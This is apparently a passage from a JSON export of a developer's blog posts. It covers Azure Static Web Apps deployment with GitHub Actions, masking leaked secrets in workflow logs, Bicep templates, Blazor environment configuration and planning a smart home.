comment.\nThis doesn’t give you a lot to go with and find the problem, so I reached out to the SWA engineering team to do some debugging and see if we could get to the bottom of it.\nPermissions, permissions, permissions As I mentioned in the deploying with Bicep post, you’ll need to authenticate against Azure, and I prefer the OIDC Connect approach, and in doing so, you need to configure the permissions of the GITHUB_TOKEN to enable id-token write.\nAnd here’s where the GitHub SWA integration broke.\nWhat I missed in the docs is that these are replacement permissions, not additive permissions, meaning if you set the token permissions in the workflow you only have those permissions.\nDon’t worry though, it’s an easy fix, you need to add pull-requests: write permissions to the token and then you’ll be good to go.\nCheck out this commit in my blog repo to see the changed permissions (I also moved the permissions to be set per job rather than per workflow).\nSummary It’s a good idea to know what permissions are needed in the workflows and at what point they are needed, so you can maintain a policy of minimum trust in your deployments.\nFor SWA, you need to ensure you have pull-requests: write set on your GITHUB_TOKEN permissions if you’re modifying the permissions and still want the Active to do comments on PRs.\n", "id": "2022-08-09-fixing-when-swa-prs-cant-add-comments" }, { "title": "Building a Smart Home - Part 2 Where to Start", "url": "https://www.aaron-powell.com/posts/2022-07-26-building-a-smart-home---part-2-where-to-start/", "date": "Tue, 26 Jul 2022 01:10:46 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Sensors, lights, plugs, switches, wifi, ZigBee, Z-Wave, oh my...", "content": "When it comes to smart home stuff there’s so many things to look at. You can control lights, climate control, have smart appliances, play music on actions, have a camera doorbell and respond to movement, and the list goes on. This can make it very daunting when getting started and can result in decision paralysis, so you never start.\nAnd that’s not even accounting for the cost of any hardware you’re getting to then no do anything with!\nWhere to start As I’m getting started on my journey, this is a question I asked myself - where will I start.\nNaturally, the answer to this will be different for everyone as everyone’s home is different and everyone’s needs are different, but here’s a few decisions that I went through in trying to work out where to start.\nDefine the problems To start exploring smart home I sat down and looked at what problems I was trying to solve.\nAs I mentioned in the first post on designing a smart home I said that the “smarts” of the home shouldn’t get in the way of the expected operation. A light switch should still switch a light, so I looked at the things that worked but could work better.\nFrom this I came up with a short list of problems:\nForgetting the washing machine was done to hang the laundry out It was cold downstairs in the morning, I’d like it to warm up before we get down Kids not turning off the TV when asked/screen time was up Ensuring the house/garage are locked up when we leave Coming home with the kids after dark and getting them upstairs to bed while asleep Solving any of these problems with a smart home wouldn’t be revolutionary by any means, but it would help improve our families quality of life, and that’s where I see a smart home really coming into play.\nThe tech As a technologist, this is really the thing I wanted to get stuck into - who doesn’t love buying new tech to play with!\nBut the kind of problems I described above can be solved in many different ways, and then you’ve got different protocols to look at, wifi, ZigBee, Z-Wave, Bluetooth, and so on.\nI’ve already decided that I’ll be using Home Assistant as the core of my solution, so I needed to explore options that would integrate with it in the simplest way possible.\nBut since this is a DIY solution, nothing will be simple so it’s a good idea to start small, buy only one of a device and test it out, before committing to a fleet of them - this saved me on a recent purchase, I found a power monitoring double plug but it turned out to only report the overall plug usage, not a per-outlet reading, which is what I wanted. Thankfully, I’d only bought one of them (around $30) and was able to return it, but even if I couldn’t return it, $30 is a lot easier a cost to swallow than the amount it would’ve been if I got as many as I ultimately want to deploy.\nSummary That comes to the end of this post, I’ve got a few ideas of things that I’d like to improve upon their current (non-smart) solutions to improve quality of life.\nAnd that’s how I see getting longevity out of this hobby, solving things I actually want solved, rather than just tinkering and hoping the coolness factor doesn’t wear off.\nIn the next post, we’ll move on from theory and start tackling one of these problems.\n", "id": "2022-07-26-building-a-smart-home---part-2-where-to-start" }, { "title": "Controlling Blazor Environments on Static Web Apps", "url": "https://www.aaron-powell.com/posts/2022-07-22-controlling-blazor-environments-on-swa/", "date": "Fri, 22 Jul 2022 06:29:21 +0000", "tags": [ "azure", "web", "dotnet" ], "description": "Deploying Blazor to SWA but want different config per-environment? Here's how to do it", "content": "Like all good problems, it started with a tweet:\nJT is trying to run a Blazor application, using appsettings.json but load a different one depending on what environment is being deployed to. Given that Blazor has the feature built in to load different configs based on the ASPNETCORE_ENVIRONMENT environment variable, it’s something that is doable, but how do we do it?\nUnderstanding Static Web Apps config On SWA we have application configuration and you might think this is the starting point for what you want to do. But this is not quite right, this is actually used to control the configuration for the Azure Functions backend that you use, not the frontend for your application.\nIn fact, there’s no way to directly control the client “environment” once it’s deployed, as the application is built before it gets to Azure, that’s one of the jobs of the GitHub Actions step, azure/static-web-apps-deploy (or you can do it yourself like I showed here). So generally speaking, if you want to inject “environment” information, you have to do it at build time.\nBlazor app settings The caveat to that last statement is Blazor doesn’t quite work like that, it it will load the appsettings.json file at runtime (you’ll see it in the network tab of the browser devtools), so how do we control that?\nWell, digging through the Blazor docs, I can across this page and it shows there are two ways to control the environment of the Web Assembly application, either via manually starting the Blazor application, or via a custom header.\nPersonally, I think the header approach is the better of the two, as it doesn’t require a code change to the files generated by Blazor, but I do wish it was an X- header, given it’s not a standard header.\nCustomizing headers in SWA So, we’re going to want to customize the headers of the SWA application, and we can do that with the staticwebapp.config.json file with the following:\n1 2 3 4 5 { "globalHeaders": { "Blazor-Environment": "<your environment here>" } } Add this file to your repo, or add the globalHeaders section to your existing config file, add some transformation logic to set the environment value during built and deploy!\nNote - if you don’t want to do it on all requests, you can use the headers section of an individual route, but I found it’s easier to do it globally.\nSummary And with that, we can control the Blazor environment on our SWA application.\nBy using the staticwebapp.config.json file we’re able to set the custom header that Blazor needs to know what environment it’s running under, and control the settings that the WASM application will load up when it runs.\n", "id": "2022-07-22-controlling-blazor-environments-on-swa" }, { "title": "Taking a SWA DevOps pipeline to the next level", "url": "https://www.aaron-powell.com/posts/2022-07-20-taking-a-swa-devops-pipeline-to-the-next-level/", "date": "Tue, 19 Jul 2022 06:53:33 +0000", "tags": [ "azure", "devops" ], "description": "The default SWA pipeline is a good starting point, but let's look at how to split it up more.", "content": "One of the things I like most about Azure Static Web Apps, aka SWA, is that it generates you a GitHub Actions workflow file for you, ensuring that you’ve got a CI/CD pipeline that will deploy the code as you push changes, making repeatable deployments happen by design. If you’re not using GitHub Actions, no problems, you can use Azure Pipelines, GitLab, Bitbucket, or the newly release cli deploy command and achieve the same repeatable workflow rather than falling back to copying files to a remote server.\nFor this post, I’ll be using GitHub Actions, as that’s what I’m using for my blog (which this article is based off), but the patterns will be the same for other build platforms.\nTo refresh, or for those who aren’t familiar with SWA, here’s the job that gets generated which will build and deploy your application to Azure:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 build_and_deploy_job: if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') runs-on: ubuntu-latest name: Build and Deploy Job steps: - uses: actions/checkout@v2 with: submodules: true - name: Build And Deploy id: builddeploy uses: Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN }} repo_token: ${{ secrets.GITHUB_TOKEN }} # Used for GitHub integrations (i.e. PR comments) action: "upload" ###### Repository/Build Configurations ###### app_location: "src" # App source code path relative to repository root api_location: "api" # Api source code path relative to repository root - optional output_location: "public" # Built app content directory, relative to app_location - optional ###### End of Repository/Build Configurations ###### The really important part of this is the Build And Deploy job as it’s responsible for two tasks, building the front end (and Functions API if it exists), then uploading it to Azure.\nWhile this workflow will cover many use cases, it’s possible to want to grow beyond it. Maybe you’re wanting to run tests as part of the pipeline, or you want to add an approval process for the deployment, or anything else that means that combining the build phase with the deploy phase can make it difficult.\nGoing beyond the default Let’s look at going beyond the default, and to illustrate a complex GitHub Actions pipeline that ultimately deploys to SWA:\nThis is a picture of the workflow for my blog and it consists of seven jobs to be run with nearly 40 steps run across them all. Some of these jobs run in parallel, some are run in sequence, but all-in-all, this is how I deploy my blog.\nSo, why is it so complicated? Well, my website is made up for three different platforms, Hugo for the blog itself, .NET for the Blazor powered search and TypeScript for the API (which I’ll blog about separately soon). Because of this, the standard SWA action won’t work; it doesn’t know what to build!\nBecause of this, I have three primary parallel jobs, build_hugo, build_api, and build_search_ui and each of these will generate artifacts to be deployed. For the post, I’ll document a much simpler process, but you can view my full (and maybe overly complex…) workflow at build-and-deploy.yml.\nBuild first, deploy later The first thing we’re going to want to do is split the build phase out from the rest of the pipeline. The actual steps you’ll run in GitHub Actions will depend on what you’re building, let’s go with a JavaScript application:\n1 2 3 4 5 6 7 8 9 10 11 12 job: build: if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') runs-on: ubuntu-latest environment: build steps: - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: node-version: 16 - run: npm ci - run: npm run build The important part here is to know where the output will go, and in this case we’re just assuming that it’s in the build folder of this hypothetical application.\nBut how do we get them later? By turning them into an artifact of the job, using the actions/upload-artifact Action:\n1 2 3 4 5 - name: Publish website output uses: actions/upload-artifact@v3 with: name: website path: ${{ github.workspace }}/build This will package the output contents of our build step and upload it to the workflow that we can use later on.\nArtifacts with lots of files If you’re working with an output that will contain a lot of files, such as a node_modules folder (because it’s a non-bundled application), you might want to package them into an archive and then upload that archive (like I do with my API):\n1 2 3 4 5 6 7 8 9 10 - run: npm ci - run: npm run build - run: mkdir ${{ github.workspace }}/${{ env.OUTPUT_FOLDER }} - run: tar -cvf ${{ github.workspace }}/${{ env.OUTPUT_FOLDER }}/api.tar . - name: Publish API output uses: actions/upload-artifact@v1 with: name: api path: ${{ github.workspace }}/${{ env.OUTPUT_FOLDER }}/api.tar This is because when uploading, it’ll do it file-by-file upload and when there’s a lot of files this can take a looooooong time (thus making builds slower), but if we create an archive, it’ll upload just a single file, which is a lot less IO.\nDeploying from artifacts Now that we’ve split out our build phase from the SWA Action, how to do we use it?\nStart by defining a new job in our workflow, deploy, and add a needs section to it saying that it needs the build job to complete first, otherwise this job will run in parallel and we can’t deploy until we’ve built!\n1 2 3 4 5 6 7 8 9 job: build: # snip deploy: runs-on: ubuntu-latest environment: production needs: [build] steps: # todo Unlike the build job, we’re not going to need actions/checkout, because we’re not needing the source code for our application, we’re going to use the prebuilt artifact, which we get from actions/download-artifact:\n1 2 3 4 5 6 7 8 9 10 11 12 13 job: build: # snip deploy: runs-on: ubuntu-latest environment: production needs: [build] steps: - name: Download website uses: actions/download-artifact@v1 with: name: website path: ${{ github.workspace }} Specify anywhere that you want the artifact to be downloaded to. In this case, we’ll put it on the root of the agent, since we know it’s a new agent for this job, there’s no other files that we need to worry about.\nNext up, we’ll bring in the azure/static-web-apps-deploy Action so that we can deploy to Azure:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 job: build: # snip deploy: runs-on: ubuntu-latest environment: production needs: [build] steps: - name: Download website uses: actions/download-artifact@v1 with: name: website path: ${{ github.workspace }} - name: Build And Deploy id: builddeploy uses: Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN }} repo_token: ${{ secrets.GITHUB_TOKEN }} # Used for GitHub integrations (i.e. PR comments) action: "upload" ###### Repository/Build Configurations ###### app_location: "" # App source code path relative to repository root api_location: "api" # Api source code path relative to repository root - optional skip_app_build: true ###### End of Repository/Build Configurations ###### There’s two secrets needed, the GITHUB_TOKEN, which is provided by GitHub and AZURE_STATIC_WEB_APPS_API_TOKEN, which is the deployment token that’s generated when you first connect the repo to SWA, can be obtained via the portal, or via the Azure CLI (and that I was leaking in my logs, prompting this blog post).\nThe other parameters we need to change for the action is that we’ll set the app_location to the place relative to the ${{ github.workspace }} (which is empty in our case) and then set skip_app_build to true, since we’ve already built, all we need to do is deploy.\nSummary And with that, we have a completed, multi-stage workflow that looks like this to build and deploy SWA (I’ve excluded the triggers for simplicities sake):\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 job: build: if: github.event_name == 'push' || (github.event_name == 'pull_request' && github.event.action != 'closed') runs-on: ubuntu-latest environment: build steps: - uses: actions/checkout@v3 - uses: actions/setup-node@v3 with: node-version: 16 - run: npm ci - run: npm run build - name: Publish website output uses: actions/upload-artifact@v3 with: name: website path: ${{ github.workspace }}/build deploy: runs-on: ubuntu-latest environment: production needs: [build] steps: - name: Download website uses: actions/download-artifact@v1 with: name: website path: ${{ github.workspace }} - name: Build And Deploy id: builddeploy uses: Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN }} repo_token: ${{ secrets.GITHUB_TOKEN }} # Used for GitHub integrations (i.e. PR comments) action: "upload" ###### Repository/Build Configurations ###### app_location: "" # App source code path relative to repository root api_location: "api" # Api source code path relative to repository root - optional skip_app_build: true ###### End of Repository/Build Configurations ###### We’ve seen how we can use artifacts to move the output from one job to another, allowing for a clearly defined build and deploy phases within our workflow.\nWith this customisation, we can introduce any additional steps to the workflow that we want, such as running tests, deploying SWA with Bicep, or running parallel jobs to speed up a workflow run.\nI have a much more complex form of this running my blog which you can see in my workflow at build-and-deploy.yml.\nBonus - splitting PR management SWA will automatically generate a preview environment from a PR, and part of that requires a second job to cleanup when the PR is closed:\n1 2 3 4 5 6 7 8 9 10 11 close_pull_request_job: if: github.event_name == 'pull_request' && github.event.action == 'closed' runs-on: ubuntu-latest name: Close Pull Request Job steps: - name: Close Pull Request id: closepullrequest uses: Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN }} action: "close" This job is included in the generated workflow file and because of that we have some if checks on the jobs, as the workflow trigger is on PR’s but we need to selectively run jobs depending on what the event that triggered the PR is.\nBut we can split this up as well, so we have a “close PR” workflow that’s independent from our “build and deploy” job, and we can do that by modifying the triggers for the workflow.\nLet’s start with our build and deploy workflow:\n1 2 3 4 5 6 7 8 on: push: branches: - main pull_request: types: [opened, synchronize, reopened] branches: - main This workflow will still run on PR, but it’ll only run if the PR is opened, synchronized (files are pushed to it), or reopened. This means we can remove the if check from our build job.\nNext, create another workflow file and move the close_pull_request_job across:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 name: Close PR on: pull_request: types: [closed] branches: - main jobs: close_pull_request_job: runs-on: ubuntu-latest name: Close Pull Request Job environment: production steps: - name: Close Pull Request id: closepullrequest uses: Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: ${{ secrets.AZURE_STATIC_WEB_APPS_API_TOKEN }} action: "close" This one is only triggered on the closed event for a PR, and runs a single step to destroy the preview environment.\nSure, it means there’s an additional workflow file that you have (and some potential for duplicated code), but I prefer the cleaner view of it and that it’s clear which workflows will run when.\n", "id": "2022-07-20-taking-a-swa-devops-pipeline-to-the-next-level" }, { "title": "Building a Smart Home - Part 1 Design", "url": "https://www.aaron-powell.com/posts/2022-07-18-building-a-smart-home---part-1-design/", "date": "Mon, 18 Jul 2022 05:28:52 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "I'm building a smart home, so come join my journey", "content": "In the middle of 2020, while the COVID pandemic was really hitting full steam, my wife and I made a decision, we’d demolish our house and build a new one, seems like the perfect time!\nWell, about 6 weeks ago, we moved into our new house and it was time for me to tackle the thing I’d been hanging out to do, making this into a smart home.\nSo with this happening, I’m going to kick off a new series on my blog, sharing my journey in building a smart home.\nBecause we’ve built this home from scratch I was able to take a lot of inspiration from what I’ve been seeing people doing online when it comes to their smart homes and incorporate it into my plans.\nHuman-centred design From following people online, the first thing that I did was plan, plan what it was that we were going to do with the house, and to do that I tackled this with a human-centred design.\nFor our house there’s 4 primary users with a range of technical skills (from myself to my 4 year old), with a range of secondary users such as our parents and friends. With this in mind, how do we make a smart home?\nThe home will only be as smart as it’s dumbest user. You see, over the years the design of every day items have been iterated on and people have built expectations based of that design. Dan Norman wrote a book called The Design of Everyday Things which culminated in the term Norman Doors.\nBut how does this apply to a smart home? If we think about the kinds of things we can add some intelligence to, lights are a common starting point but are also an easy way to break expected design. If I can walk up to a light switch and flip it to change the state, it’s not smart, it’s a broken design.\nAfter all, our house shouldn’t require a manual to live in and operate.\nAs an aside - we do have something that I would put in this category of poor design, our fans. We put fans in each of our bedrooms and they are a broken user experience. There’s a switch on the wall and it’ll turn on the light in the fan, and we have a remote to turn the fan on/adjust speed. Then if you turn off the switch the light goes off… and so does the fan 😒. Turns out the switch controls power to the whole circuit, not just the light, so if you want the fan on you have to flip the switch, turn it on with the remote then use the remote to turn off the light, which isn’t great in summer and you want to turn the fan on during the night (we had the same ones in the place we rented, so we’re familiar with them). I’ll talk about solving that in a future post.\nWhat’s smart then So how do we make a house smart while not breaking the expectations that we have as users?\nTo achieve this, I’m going to be tackling it from a progressive enhancement point of view. Take our light switch example, a light switch should still operate as a light switch, but it should also be adaptive to our needs. If I’m watching a movie in the media room, it should adjust the lighting accordingly.\nThe tech Right now, we’re still in the early stages of “smartening” the house, so the tech aspect of it is basic, but there are two core pieces to it, first is Google Home. My wife and I are both Android phone users, so we use Google Assistant a bit, and for a few years we’ve had some Google Home/Nest speakers to set timers/play music/etc., so it makes sense for that to be the primary user interface.\nFor the brains of the operation, I’m using Home Assistant as a hub, running on a Raspberry Pi 4 (HAOS install - the Pi 4 is dedicated for Home Assistant). I originally experimented with a Pi 3a for running Home Assistant, but kept finding that I was running out of memory on the device, so I upgraded to a Pi 4.\nI also configured it to boot from USB, rather than the SD card (which is the default), so you don’t have to worry about the write-lifetime (I fried an SD card while experimenting and lost a whole setup).\nNetworking The other part of my plans was how to tackle networking. Since moving out of home, I’ve always seemed to deal with shit wifi. I’ve built hodgepodge systems of routers with bridging access points, Ethernet over Power bridges, strung ethernet cables, and they’ve always been, at the best, ok.\nSince we’re building from scratch I decided to do this right, and that meant running CAT6a everywhere of importance, then having access points covering the aspects of our house. Basically, if the device won’t move (TV, desktop PC, etc.) it should get ethernet, otherwise it can use wifi.\nWith our new house the NBN connection comes into the garage, with two downstairs living spaces (one at each end of the floor), an upstairs living space, as well as a home office. These were the points deemed necessary to have ethernet, as then I can run a cable to each TV, as well as to my home office.\nI’ve gone with Unifi products (while they are more expensive, I’m happy to be in the prosumer market) and have a setup consisting of a Unifi Dream Machine (UDM) - NBN comes into that, a USW Lite 16 port PoE switch and 3 InWall HD’s (one behind each TV). The garage has an 8 ports going out to the house, which go to our TV’s, 2 to my office, 1 to my wife’s office and 2 external for cameras.\nIn total, we have 32 ethernet ports across the UDM, Lite 16 and InWall HD’s (in reality, less as the Lite 16 runs the InWall’s), and that gives me plenty of ports to run everything where they need to be.\nIs it overkill? Probably. Do I get full signal strength everywhere in the house? Absolutely.\nPower The other thing to plan for when designing for a smart home is power. The rule of thumb is that you can never have enough power points, and even when you’ve put them all in, they’ll still not be enough.\nFor the main points in our house, behind the TV’s, I put 4-plug wall plates, which will give enough to do direct plugging in for most appliances, but you can always expand with power boards as needed. For example, our media room had power for the TV, Xbox and Xbox controller charger, which leaves one left over for a soundbar (or similar) in the future, before having to put in an expander (we also have an additional 2 points elsewhere for the recliners 😉).\nWe have some oddities in some rooms though, like our laundry has a heap of single power points, rather than doubles, so I’ll have to review that down the track when laundry is the space to make smart.\nSummary This brings me to the end of the first post in this series.\nComing into this project with a from-scratch house build has made it a lot easier for me to design for what I want, rather than having to retrofit into the house.\nI really think that the most important aspect is approaching a smart home from the human perspective is important. Making it “smart” by just throwing tech in the house will run the risk of breaking expectations that people will have on how things work. No one wants to live with a Norman Door every day.\nSo, think through your connectivity, think through your power requirements, but most importantly, think through the people who will use the house and design for them.\n", "id": "2022-07-18-building-a-smart-home---part-1-design" }, { "title": "Working With add-mask and GitHub Actions for dynamic secrets", "url": "https://www.aaron-powell.com/posts/2022-07-14-working-with-add-mask-and-github-actions/", "date": "Thu, 14 Jul 2022 01:00:33 +0000", "tags": [ "devops" ], "description": "This took a lot of chasing down to work out, so hopefully I can save you some time", "content": "I’ve been doing an overhaul of the GitHub Actions workflow that power my blog, which I’ll write a separate post about, but on of the new steps I’ve added is an Azure CLI command that gets the SWA deployment token, rather than having it set as a secret in the GitHub repo.\nSo the steps of the workflow are 1. make a call to get the token, 2. set it as an environment variable (you could use a step output if preferred), and 3. provide it to the SWA deployment action.\nBut the problem is, environment variables aren’t secret in the logs, meaning your logs will end up something like this:\nRun Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: 3c0399e8e4f1456f8249ce89209946c7c6a3fa79a3acf6c17236b9cbb7b1dc54-<snipped for blog post> repo_token: *** action: upload skip_app_build: true skip_api_build: true app_location: .output api_location: .output-api env: OUTPUT_FOLDER: .output DOTNET_VERSION: 6.x AZURE_HTTP_USER_AGENT: AZUREPS_HOST_ENVIRONMENT: SWA_DEPLOYMENT_TOKEN: 3c0399e8e4f1456f8249ce89209946c7c6a3fa79a3acf6c17236b9cbb7b1dc54-<snipped for blog post> Yeah, that happened to me, and yes, the logs did contain the active deployment token for my blog (it’s been regenerated now for those who want to do naughty things!).\nWhoops!\nThis is an easy mistake to make, you have a step that’s connecting to a service securely to get something else to pass on that’s meant to be secret but it’s inadvertently leaked via your logs. So, how do we address that?\nThe add-mask workflow command GitHub Actions has a set of workflow commands that can be used for a variety of things, such as set-output for outputting from a script.\nBut for our use-case, we want to use the add-mask command, and I’ll admit that I found it a little confusing.\nHow add-mask works My mistake was that I assumed that add-mask worked like set-output, only it would make something a “secret” in the logs, but that’s not correct.\nThe way add-mask works is that it takes a value and from that point onwards when that value is to be written to the logs, it’ll be masked. And this is the important point to note, masking will only be applied to log messages after it is used, so you need to ensure it’s used as early as possible, relative to the usage of the value you wish to mask.\nUsing add-mask Here’s a basic workflow that uses add-mask:\n1 2 3 4 5 6 7 8 9 10 11 12 13 on: workflow_dispatch: push: branches: - main jobs: masking: runs-on: ubuntu-latest steps: - run: | echo '::add-mask::test' echo This is a test And here’s the raw output from that workflow run (I’ve truncated to just the job run):\n2022-07-14T01:27:14.0104402Z ##[group]Run echo '::add-mask::test' 2022-07-14T01:27:14.0104910Z [36;1mecho '::add-mask::test'[0m 2022-07-14T01:27:14.0105274Z [36;1mecho This is a test[0m 2022-07-14T01:27:14.0906476Z shell: /usr/bin/bash -e {0} 2022-07-14T01:27:14.0907141Z ##[endgroup] 2022-07-14T01:27:14.1473068Z This is a *** 2022-07-14T01:27:14.1729814Z Cleaning up orphan processes Notice the second last line, where it says This is a ***? that’s happened because we’ve used add-mask to mask ever time the work test appears in our log, but you will see that it doesn’t mask it in the first 3 lines, because at that point, the mask hasn’t yet been applied, so it doesn’t know to mask there (the first three lines are the logs dumping out the script that’s going to be run before it’s run).\nThat is a little bothersome, but realistically, you’re unlikely to have a hard-coded string in the workflow file that you want to mask in logs, after all, if it’s hard-coded in the workflow, then it’s already publicly visible, masking in logs won’t solve anything. Instead, you’re more likely to mask something that is computed, or retrieved from elsewhere.\nMasking the SWA deployment token Let’s go back to the problem I originally had, I need to mask the deployment token I get from the Azure CLI.\nHere’s the original step in the workflow:\n1 2 3 4 5 - name: Get SWA deployment token uses: azure/CLI@v1 with: inlineScript: | echo SWA_DEPLOYMENT_TOKEN=$(az staticwebapp secrets list -n ${{ secrets.SWA_NAME }} -o tsv --query properties.apiKey) >> $GITHUB_ENV We’re generating an environment variable assigned to the az staticwebapps secrets list call, so this step won’t leak it to our logs, just every subsequent step, since this is an environment variable (again, I should probably use a step output, and maybe I will after writing this post…).\nSince we can capture the token in a way that won’t log, all we need to do now is provide that to add-mask, so let’s update this step:\n1 2 3 4 5 6 7 - name: Get SWA deployment token uses: azure/CLI@v1 with: inlineScript: | SWA_DEPLOYMENT_TOKEN=$(az staticwebapp secrets list -n ${{ secrets.SWA_NAME }} -o tsv --query properties.apiKey) echo "::add-mask::$SWA_DEPLOYMENT_TOKEN" echo SWA_DEPLOYMENT_TOKEN=$SWA_DEPLOYMENT_TOKEN >> $GITHUB_ENV Now what we’re doing is splitting this down a bit more finely than before and we:\nCapture the token as a variable within this script Provide it to the add-mask call Push it out as an environment variable for the following steps When this step is hit in the logs, we’ll see the following:\nRun azure/CLI@v1 with: inlineScript: SWA_DEPLOYMENT_TOKEN=$(az staticwebapp secrets list -n *** -o tsv --query properties.apiKey) echo "::add-mask::$SWA_DEPLOYMENT_TOKEN" echo SWA_DEPLOYMENT_TOKEN=$SWA_DEPLOYMENT_TOKEN >> $GITHUB_ENV Since the script hasn’t been evaluated yet, the add-mask line shows it will use a variable, but not the value of that variable. Then the script is run and add-mask is applied so that when subsequent steps are executed, the logs now look like this:\nRun Azure/static-web-apps-deploy@v1 with: azure_static_web_apps_api_token: *** repo_token: *** action: upload skip_app_build: true skip_api_build: true app_location: .output api_location: .output-api env: OUTPUT_FOLDER: .output DOTNET_VERSION: 6.x AZURE_HTTP_USER_AGENT: AZUREPS_HOST_ENVIRONMENT: SWA_DEPLOYMENT_TOKEN: *** Success! Our deployment token is no longer visible to anyone via our logs.\nConclusion Leaking credentials via log files is something that is really easy to accidentally do - I’ve been doing this with my SWA deployment token for a few weeks now and thankfully no one noticed. While being able to deploy new files to my blog might not be the end of the world, this is the sort of thing that can leave a company exposed without them even realising it.\nGitHub providing the add-mask workflow command is really useful to do on-the-fly sanitisation of your log files, but it’s a little confusing on how you would use it, so remember, add-mask takes a value that you want to mask, it’s not for creating new outputs/environment variables/etc., and the masking is only applied for log entries that appear after the add-mask command is executed, so execute it as early as you can.\n", "id": "2022-07-14-working-with-add-mask-and-github-actions" }, { "title": "Deploy Azure Static Web Apps With Bicep", "url": "https://www.aaron-powell.com/posts/2022-06-29-deploy-swa-with-bicep/", "date": "Wed, 29 Jun 2022 00:41:50 +0000", "tags": [ "azure", "devops" ], "description": "I'm trying to get better at using Infrastructure as Code, so first up - deployments with SWA!", "content": "In an effort to constantly tinker with things that probably don’t need to be tinkered with, I’ve decided that it’s time to do an upgrade to my CI/CD pipeline so that I can use Bicep to deploy Azure Static Web Apps (I’m also using this as a way to learn more about Bicep as well).\nBecause I’m using VS Code I’ve gone ahead and installed the Bicep Extension so that I get some nice syntax highlighting in the editor.\nWriting Bicep With the editor ready, let’s write some Bicep! Create a new file named swa.bicep and paste the following code into it:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 param name string @allowed([ 'centralus', 'eastus2', 'eastasia', 'westeurope', 'westus2' ]) param location string @allowed([ 'Free', 'Standard' ]) param sku string = 'Standard' resource swa_resource 'Microsoft.Web/staticSites@2021-01-15' = { name: name location: location tags: null properties: {} sku: { name: sku size: sku } } This is about as simple as you can get when it comes to deploying SWA with Bicep, as it’s not deploying a backend service, but rather a static website.\nFirst up, there’s three parameters defined, the name of the SWA instance, the location and what sku to use (and the sku is defaulted to Standard). There’s also an allow-list of values for location and sku, since they have some restrictions on them and this will reduce the possibility of invalid values.\nThen we define the resource that we’re deploying with the symbolic-name swa_resource (that we could use elsewhere if required) and the resource name plus the version.\nThis is the minimum fields that you need to provide to Bicep for defining the resource, with tags and properties essentially ignores in ours, but you need to include them or the deployment will fail with a rather obscure error message. The tags property is pretty straight forward, but let’s talk about properties for a bit.\nUnderstanding properties in our Bicep file For my use-case, I’ve got a highly customised deployment pipeline, and as such, I’m essentially just uploading a pre-built application to SWA, but that’s not the most common approach, instead, you’re more likely wanting to get the resource configured for deployment as part of the Bicep template, and we control that with the properties section.\nHere’s a more expanded definition, adapted from the Bicep docs:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 properties: { branch: 'string' buildProperties: { apiBuildCommand: 'string' apiLocation: 'string' appArtifactLocation: 'string' appBuildCommand: 'string' appLocation: 'string' githubActionSecretNameOverride: 'string' outputLocation: 'string' skipGithubActionWorkflowGeneration: bool } provider: 'string' repositoryToken: 'string' repositoryUrl: 'string' } Including values for this will instruct Azure to provision the GitHub Actions workflow for you, and you can use the branch and repositoryUrl to specify what to build, and the other options will configure how it’s built (where the app and API are in the repo, etc.), so I could have set it like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 resource swa_resource 'Microsoft.Web/staticSites@2021-01-15' = { name: name location: location tags: null properties: { branch: 'main', repositoryToken: tokenParam, repositoryUrl: 'https://github.com/aaronpowell/aaronpowell.github.io', buildProperties: { appLocation: './', apiLocation: './api', outputLocation: './output' } } sku: { name: sku size: sku } } (That’s not entirely reflective of my repo setup as it’s highly customised, but it gives an overview.)\nModularlising the Bicep file The swa.bicep file is really all we need, but let’s put some good practices in place and modularise it so that if we want to add other services in the future, we can do that without too much hassle. For this, create another file, main.bicep, which will be our entrypoint:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 param location string = resourceGroup().location param swaName string @allowed([ 'Free', 'Standard' ]) param swaSku string = 'Free' module staticWebApp 'swa.bicep' = { name: '${deployment().name}--swa' params: { location: location sku: swaSku name: swaName } } We’ve got the same set of params defined as the other file, with the only difference being the location is being derived from the resource group that we’re deploying to using the resourceGroup() function.\nTo call the swa.bicep file, we’re defining it as a module and passing in the param values that it needs, and giving it a dynamically generated name.\nWith the files setup, it’s time to use them from GitHub Actions.\nDeploying with GitHub Actions Since Bicep is a DSL over ARM (Azure Resource Manager), we can use the azure/arm-deploy GitHub Action to deploy it as well, since the Action will determine if we’re deploying a Bicep or ARM file.\nBut before we can deploy that, we’re going to need to log into Azure, which we can do with the azure/login Action:\n1 2 3 4 5 6 - name: Azure Login uses: azure/login@v1 with: client-id: ${{ secrets.AZURE_CLIENT_ID }} tenant-id: ${{ secrets.AZURE_TENANT_ID }} subscription-id: ${{ secrets.AZURE_SUBSCRIPTION_ID }} There’s different ways that you can provide credentials to Azure for the Action to authenticate with, my preference is to use the OIDC Connect method as its setup is the most straight forward to me.\nNote: Changing the permissions of the GITHUB_TOKEN is required but it may cause an unexpected side effect that PR comments won’t work. Check out this post for how to address it.\nFollow the guide on setting up via Portal, CLI or PowerShell, I prefer Azure CLI myself:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 app=$(az ad app create --display-name blog-deployer -o json) 